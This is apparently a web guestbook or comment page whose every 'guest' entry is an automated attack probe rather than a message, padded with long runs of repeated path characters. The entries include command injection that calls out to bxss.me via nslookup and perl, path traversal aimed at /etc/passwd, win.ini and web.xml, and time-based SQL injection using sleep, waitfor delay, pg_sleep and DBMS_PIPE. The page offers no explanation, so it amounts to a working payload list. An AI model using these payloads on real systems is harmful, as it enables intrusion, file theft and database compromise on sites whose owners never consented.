/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: guest
|(nslookup hitmdxjtutrvxae2a6.bxss.me||perl -e "gethostbyname('hitmdxjtutrvxae2a6.bxss.me')")
re: guest
file:///etc/passwd
re: guest
`(nslookup hitmucrztecpyf3dfc.bxss.me||perl -e "gethostbyname('hitmucrztecpyf3dfc.bxss.me')")`
re: guest
/\../\../\../\../\../\../\../etc/passwd
re: guest
;(nslookup hitxowgwxuhzw35a11.bxss.me||perl -e "gethostbyname('hitxowgwxuhzw35a11.bxss.me')")|(nslookup hitxowgwxuhzw35a11.bxss.me||perl -e "gethostbyname('hitxowgwxuhzw35a11.bxss.me')")&(nslookup hitxowgwxuhzw35a11.bxss.me||perl -e "gethostbyname('hitxowgwxuhzw35a11.bxss.me')")
re: guest
/WEB-INF/web.xml
re: guest
C:\WINDOWS\system32\drivers\etc\hosts
re: guest
../../../../../../../../../../windows/win.ini%00.jpg
re: guest
/../../../../../../../../../../boot.ini
re: guest
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: guest
..\..\..\..\..\..\..\..\windows\win.ini
re: guest
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: guest
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: guest
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: guest
WEB-INF/web.xml
re: guest
WEB-INF\web.xml
re: guest
1
re: guest
1
re: guest
-1 OR 2+375-375-1=0+0+0+1 --
re: guest
-1 OR 3+375-375-1=0+0+0+1 --
re: guest
-1 OR 2+163-163-1=0+0+0+1
re: guest
-1 OR 3+163-163-1=0+0+0+1
re: guest
-1' OR 2+292-292-1=0+0+0+1 --
re: guest
-1' OR 3+292-292-1=0+0+0+1 --
re: guest
-1' OR 2+430-430-1=0+0+0+1 or 'hYWgwSGq'='
re: guest
-1' OR 3+430-430-1=0+0+0+1 or 'hYWgwSGq'='
re: guest
-1" OR 2+134-134-1=0+0+0+1 --
re: guest
-1" OR 3+134-134-1=0+0+0+1 --
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
duA0jcdG'; waitfor delay '0:0:15' --
re: guest
-5 OR 866=(SELECT 866 FROM PG_SLEEP(15))--
re: guest
-5) OR 491=(SELECT 491 FROM PG_SLEEP(15))--
re: guest
-1)) OR 542=(SELECT 542 FROM PG_SLEEP(15))--
re: guest
u24DQCZY' OR 771=(SELECT 771 FROM PG_SLEEP(15))--
re: guest
ekQVQCaH') OR 512=(SELECT 512 FROM PG_SLEEP(15))--
re: guest
POXwLnLa')) OR 455=(SELECT 455 FROM PG_SLEEP(15))--
re: guest
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@4ue3T